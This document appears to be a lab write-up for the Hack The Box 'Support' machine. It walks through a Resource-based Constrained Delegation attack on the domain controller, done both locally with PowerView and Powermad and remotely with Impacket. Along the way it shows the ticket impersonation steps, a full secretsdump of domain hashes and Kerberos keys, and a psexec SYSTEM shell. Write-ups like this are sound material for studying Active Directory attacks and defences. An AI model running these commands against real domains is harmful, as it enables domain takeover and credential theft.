InfoSec LAB

Support_Privilege_Escalation

Created: 6 min read

RBCD (Resource-based Constrained Delegation) Attack

The target domain has been identified to contain a critical misconfiguration due to granting a domain user the transitive GenericAll access over the DC$ host, potentially leading to the Resource-based Constrained Delegation attack

Local (PowerView.ps1 and Powermad.ps1)

*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
[+] Machine account attackersystem added

Since there isn’t any account with a configured SPN that I can control, I can first leverage the default SeMachineAccountPrivilege access to create a domain computer object,attackersystem$:Summer2018!, via the Powermad’s New-MachineAccount cmdlet

*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
 
*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid
S-1-5-21-1677581083-3380853377-188903654-5101

Then, I can use PowerView’s Get-DomainComputer cmdlet to retrieve and store the SID of the newly created computer object (attackersystem$)

Arbitrary ACE with SID

*evil-winrm* ps c:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" ; $SDBytes = New-Object byte[] ($SD.BinaryLength) ; $SD.GetBinaryForm($SDBytes, 0)

Then, an arbitrary ACE must be built with the SID of the newly created computer object (attackersystem$) and get the binary bytes for the newly created arbitrary DACL/ACE This will become part of the SD (Security Descriptor) of the target object (DC$)

Delegation

*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Lastly, the msds-allowedtoactonbehalfofotheridentity attribute of the target object (DC$) must be modified to contain the created ACE above

Impersonation

Now, I just need to request a service ticket to the DC$ host as the newly created computer account (attackersystem$) with the granted delegation right

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ bloodyAD -d SUPPORT.HTB -u 'attackersystem$' -p 'Summer2018!' --host dc.support.htb get object 'CN=DC,OU=DOMAIN CONTROLLERS,DC=SUPPORT,DC=HTB' --attr servicePrincipalName 
 
distinguishedname: CN=DC,OU=DOMAIN CONTROLLERS,DC=SUPPORT,DC=HTB
serviceprincipalname: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dc.support.htb; ldap/dc.support.htb/ForestDnsZones.support.htb; ldap/dc.support.htb/DomainDnsZones.support.htb; DNS/dc.support.htb; GC/dc.support.htb/support.htb; RestrictedKrbHost/dc.support.htb; RestrictedKrbHost/DC; RPC/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb; HOST/DC/SUPPORT; HOST/dc.support.htb/SUPPORT; HOST/DC; HOST/dc.support.htb; HOST/dc.support.htb/support.htb; E3514235-4B06-11D1-AB04-00C04FC2DCD2/290156e5-22cb-4f1b-9b96-5516d84c363c/support.htb; ldap/DC/SUPPORT; ldap/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb; ldap/dc.support.htb/SUPPORT; ldap/DC; ldap/dc.support.htb; ldap/dc.support.htb/support.htb

and there are a lot of SPNs to choose from. I will go with the generic ldap/dc.support.htb SPN

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-getST 'support.htb/attackersystem$' -spn 'ldap/dc.support.htb' -impersonate administrator -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: Summer2018!
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache

Impersonation complete. Service ticket saved

Hashdump

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=administrator.ccache impacket-secretsdump support.htb/@dc.support.htb -no-pass -k -dc-ip $IP      
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf678b2597ade18d88784ee424ddc0d1a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
SUPPORT\DC$:plain_password_hex:de30d9f73963d4aefdcf8b739b68c5819d5112af1fc4bc912d79dd1f295de670c900baf76fff46b945bf07671fa24c9cad7f4fe82a2328909bb4a272baa64e7fea7ca6208170f7dbc9624e2ffad75765d4849f46d1e1e661598870520e044554edc9613713dd0f9a9741ba23db2627e8f66995f1f23a45bf8b7919934f592241d39e0a67f0d6a1cc8f9ef70f172fcddc6d52fee7e82b58ef6b8c9cbf0131ce220802a5d972904fc9964d0c2575d0bfe50b9a1d3153a94442cfd32ffe48237363c4b7d736ac16f6aa1b5b438f563e9c43ae8de595637426bbec8fd9646653fe07f054bdc1ed06eee024e4d61e823c9051
SUPPORT\DC$:aad3b435b51404eeaad3b435b51404ee:d3430dfec60242257afcc1fff6f43906:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x5f39b9187072640dd3b9ebc53cdcbd2cda166279
dpapi_userkey:0xc98d4a2ff3c17181eaaad459d6383cff7c72bc2d
[*] NL$KM 
 0000   D7 80 3F C7 76 67 B3 22  E7 C9 9B 98 33 D7 F1 A4   ..?.vg."....3...
 0010   E9 EE B2 38 B7 E0 34 5F  12 36 AB 44 F2 4F 75 7D   ...8..4_.6.D.Ou}
 0020   56 22 0F 0F 3C 2D 2E 4C  E6 FD 61 01 63 A4 32 B4   V"..<-.L..a.c.2.
 0030   CE 66 7B DB E7 CF 28 F8  4C 9E 9C 46 A0 61 1B 8B   .f{...(.L..F.a..
NL$KM:d7803fc77667b322e7c99b9833d7f1a4e9eeb238b7e0345f1236ab44f24f757d56220f0f3c2d2e4ce6fd610163a432b4ce667bdbe7cf28f84c9e9c46a0611b8b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
ldap:1104:aad3b435b51404eeaad3b435b51404ee:b735f8c7172b49ca2b956b8015eb2ebe:::
support:1105:aad3b435b51404eeaad3b435b51404ee:11fbaef07d83e3f6cde9f0ff98a3af3d:::
smith.rosario:1106:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
hernandez.stanley:1107:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
wilson.shelby:1108:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
anderson.damian:1109:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
thomas.raphael:1110:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
levine.leopoldo:1111:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
raven.clifton:1112:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
bardot.mary:1113:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
cromwell.gerard:1114:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
monroe.david:1115:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
west.laura:1116:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
langley.lucy:1117:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
daughtler.mabel:1118:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
stoll.rachelle:1119:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
ford.victoria:1120:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d3430dfec60242257afcc1fff6f43906:::
MANAGEMENT$:2601:aad3b435b51404eeaad3b435b51404ee:3f99f2f26988d1f348d378e84f86bc58:::
attackersystem$:5101:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f5301f54fad85ba357fb859c94c5c31a6abe61f6db1986c03574bfd6c2e31632
Administrator:aes128-cts-hmac-sha1-96:678dcbcbf92bc72fd318ac4aa06ede64
Administrator:des-cbc-md5:13a8c8abc12f945e
krbtgt:aes256-cts-hmac-sha1-96:21f4a7ed00009605ac5182a3d607d25447f48a3f13fbf60912f1e863a70d7141
krbtgt:aes128-cts-hmac-sha1-96:e963352bcdd503ddc3017a2afd620ccb
krbtgt:des-cbc-md5:70b3fdaefe454ad5
ldap:aes256-cts-hmac-sha1-96:f54423bd0d85939de61519c02fad691596f47c0a34cdf0983131bb962ee6ae7a
ldap:aes128-cts-hmac-sha1-96:0447dc15751883c29d9f450acc95db3d
ldap:des-cbc-md5:2ada4ccbcbceb901
support:aes256-cts-hmac-sha1-96:ada63670275687524019008a737c3b57cbf2d1be9eb08a60954a3dcb9268f4e4
support:aes128-cts-hmac-sha1-96:34a8a853cee33abe1668d7660a1affd9
support:des-cbc-md5:79fdc47f98ea70f2
smith.rosario:aes256-cts-hmac-sha1-96:4ce2d5be0ad97e2ff69e7103f3baee3ee58826dbf6061187f266859a294648b3
smith.rosario:aes128-cts-hmac-sha1-96:d181b8c4247a3fa19d7ad76d0026b264
smith.rosario:des-cbc-md5:495d086b52917c6e
hernandez.stanley:aes256-cts-hmac-sha1-96:665165633c8446cfc4264434307c336ddfd91372fda23dc318fb99369c6b78ec
hernandez.stanley:aes128-cts-hmac-sha1-96:8f62b1cba1910f730d905fe388acd69c
hernandez.stanley:des-cbc-md5:a24a340ec885046b
wilson.shelby:aes256-cts-hmac-sha1-96:3f72fd104691e5c59664834bba1d4b9ddbbfea30605cb2120fafa1ee8720b502
wilson.shelby:aes128-cts-hmac-sha1-96:1ea7512778994ec36b259d590df0a188
wilson.shelby:des-cbc-md5:622089cb10152fcd
anderson.damian:aes256-cts-hmac-sha1-96:cb56856b143d38b9191d16ab1e64f9460d06f29a406b37f3da9925a21d87d092
anderson.damian:aes128-cts-hmac-sha1-96:e18d3688bcacab591dabf00f080369f4
anderson.damian:des-cbc-md5:329ee6d3405834e5
thomas.raphael:aes256-cts-hmac-sha1-96:c1c5ec89304832e7bbbc3cc2a108671df6464bd5989e8156e84e540bcac12ac0
thomas.raphael:aes128-cts-hmac-sha1-96:e5212c20b62c46245fc7e3843b4db754
thomas.raphael:des-cbc-md5:8c2064c4e975e31c
levine.leopoldo:aes256-cts-hmac-sha1-96:f3f471fa904dafa639d562b713ca57d6668e8e58c4838490e1e038f70e86fabb
levine.leopoldo:aes128-cts-hmac-sha1-96:3b8c7b502154308728e6092a0c524190
levine.leopoldo:des-cbc-md5:0464734a207f5d04
raven.clifton:aes256-cts-hmac-sha1-96:5ead58d4439aa8e64ce828f628629b0798c192f9925908670779a212178bce70
raven.clifton:aes128-cts-hmac-sha1-96:a3862f3e0c9096d735eb9e075b46ed9e
raven.clifton:des-cbc-md5:b6252651b01ff452
bardot.mary:aes256-cts-hmac-sha1-96:54123fcaa07765a4d8136cf95cff67173d31d6c049f1d0936cb33c257aab20c5
bardot.mary:aes128-cts-hmac-sha1-96:a941571a50d40fa5771c8deffa44a501
bardot.mary:des-cbc-md5:bc79e0a8f7dfdc10
cromwell.gerard:aes256-cts-hmac-sha1-96:397983e21a3742e1d9c53bd51570a89dfdb9b79cfc15eb294500e16eee9c5a0c
cromwell.gerard:aes128-cts-hmac-sha1-96:a495521b2d0992a21d0cd6b968dbb042
cromwell.gerard:des-cbc-md5:0e2f37ae7c58310b
monroe.david:aes256-cts-hmac-sha1-96:13dd6e3f424e0e3b394964ceaf9f739c19a680c97648b1531b8e417012d9775d
monroe.david:aes128-cts-hmac-sha1-96:a15fd3bccfb2e7ead3bdf2fe4c47f355
monroe.david:des-cbc-md5:a86b5829047f2557
west.laura:aes256-cts-hmac-sha1-96:54a3167b1c9ee166874a6b09b08621394b049197270d4b754e8fedb78ee86b88
west.laura:aes128-cts-hmac-sha1-96:864381e434a5856d85c1f61bc8726378
west.laura:des-cbc-md5:8a923480ec7cd9d3
langley.lucy:aes256-cts-hmac-sha1-96:f2415b075b6e205864de19917a9989398672b062dad29d58af177d358e086998
langley.lucy:aes128-cts-hmac-sha1-96:20cdc3297fc8138726e34e45ba9f73d6
langley.lucy:des-cbc-md5:fd738a3dd0028fb0
daughtler.mabel:aes256-cts-hmac-sha1-96:7ce8f29915849ec300bd81341759d19c67e045501e1ee7e198fe37a7ee51af8d
daughtler.mabel:aes128-cts-hmac-sha1-96:791efedf5473d798dbc3267ce6d045aa
daughtler.mabel:des-cbc-md5:01ba80795bbc3ea8
stoll.rachelle:aes256-cts-hmac-sha1-96:d9cca58315e797cdb21ca8ad71278112357291a970a90084586a38d4c5ff38c2
stoll.rachelle:aes128-cts-hmac-sha1-96:c7768011ce94e18fae341bdfb5223bc3
stoll.rachelle:des-cbc-md5:b63d15683434b38f
ford.victoria:aes256-cts-hmac-sha1-96:de0a90f4f874ebb0937df96bc14308dcbb54835ac622ad16b79cf9509313f205
ford.victoria:aes128-cts-hmac-sha1-96:2241c9137590e4bde952ac411a1c22c6
ford.victoria:des-cbc-md5:13d573730ba8641f
DC$:aes256-cts-hmac-sha1-96:43563f25cdec84d264b5779593000b4c178f99a9924b17dd3e08f637c5e859b3
DC$:aes128-cts-hmac-sha1-96:3781da7a7e00494fda80dbc459843cce
DC$:des-cbc-md5:9e3123c2e93de69d
MANAGEMENT$:aes256-cts-hmac-sha1-96:e1080e0ca1d845206ef99d5b6d336095c3362efd55e516442de41738d18a1b92
MANAGEMENT$:aes128-cts-hmac-sha1-96:fcf45088bf727e997d0368bd88bdbf02
MANAGEMENT$:des-cbc-md5:40c7f4582c75b364
attackersystem$:aes256-cts-hmac-sha1-96:7b51e11634b9927104ca3b97e4f4ad49d8c110d1f9c25e3ae61c1a7f86de0a8f
attackersystem$:aes128-cts-hmac-sha1-96:91e231cccd3ebc4315ecc17371865544
attackersystem$:des-cbc-md5:fb261689754ac479
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Remote (Impacket)

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=support@dc.support.htb.ccache impacket-addcomputer 'SUPPORT.HTB/@dc.support.htb' -no-pass -k -computer-name 'blah$' -computer-pass 'Qwer1234' -dc-host dc.support.htb
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] smb sessionerror: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
smb sessionerror: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -computer-name 'blah$' -computer-pass 'Qwer1234' -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Successfully added machine account blah$ with password Qwer1234.

adding a computer object; blah$:Qwer1234 The initial attempt via Kerberos authentication with the TGT of the support account failed due to the SMB error It worked out eventually with the regular NTLM authentication

Arbitrary ACE with the SID and Delegation

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=support@dc.support.htb.ccache impacket-rbcd 'support.htb/' -no-pass -k -delegate-from 'blah$' -delegate-to 'DC$' -action write -dc-ip $IP             
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-1677581083-3380853377-188903654-5101)
[*] Delegation rights modified successfully!
[*] blah$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-1677581083-3380853377-188903654-5101)
[*]     blah$        (S-1-5-21-1677581083-3380853377-188903654-5102)

The command above writes the SID of the newly created blah$ account to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the DC$ host

Confirmation

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ bloodyAD -d SUPPORT.HTB -u 'blah$' -p 'Qwer1234' --host dc.support.htb get object 'CN=DC,OU=DOMAIN CONTROLLERS,DC=SUPPORT,DC=HTB' --attr msDS-AllowedToActOnBehalfOfOtherIdentity
 
distinguishedname: CN=DC,OU=DOMAIN CONTROLLERS,DC=SUPPORT,DC=HTB
msds-allowedtoactonbehalfofotheridentity: O:S-1-5-32-544D:(A;;0xf01ff;;;S-1-5-21-1677581083-3380853377-188903654-5101)(A;;0xf01ff;;;S-1-5-21-1677581083-3380853377-188903654-5102)

This can be checked for confirmation. Querying for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the DC$ host now shows 2 ACEs entry;

  • a;;0xf01ff;;;s-1-5-21-1677581083-3380853377-188903654-5101: This is made with the attackersystem$ account from the local exploit earlier
  • a;;0xf01ff;;;s-1-5-21-1677581083-3380853377-188903654-5102: This is the newly created blah$ account

Service Ticket (Impersonate)

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-getST 'support.htb/blah$' -spn 'DNS/dc.support.htb' -impersonate administrator -dc-ip $IP       
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: Qwer1234
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache

Impersonation complete. Service ticket saved

Shell Drop

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=administrator.ccache impacket-psexec support.htb/@dc.support.htb -no-pass -k -dc-ip $IP     
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file nGZadwgL.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service QetT on dc.support.htb.....
[*] Starting service QetT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
dc
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.11.174
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : 10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks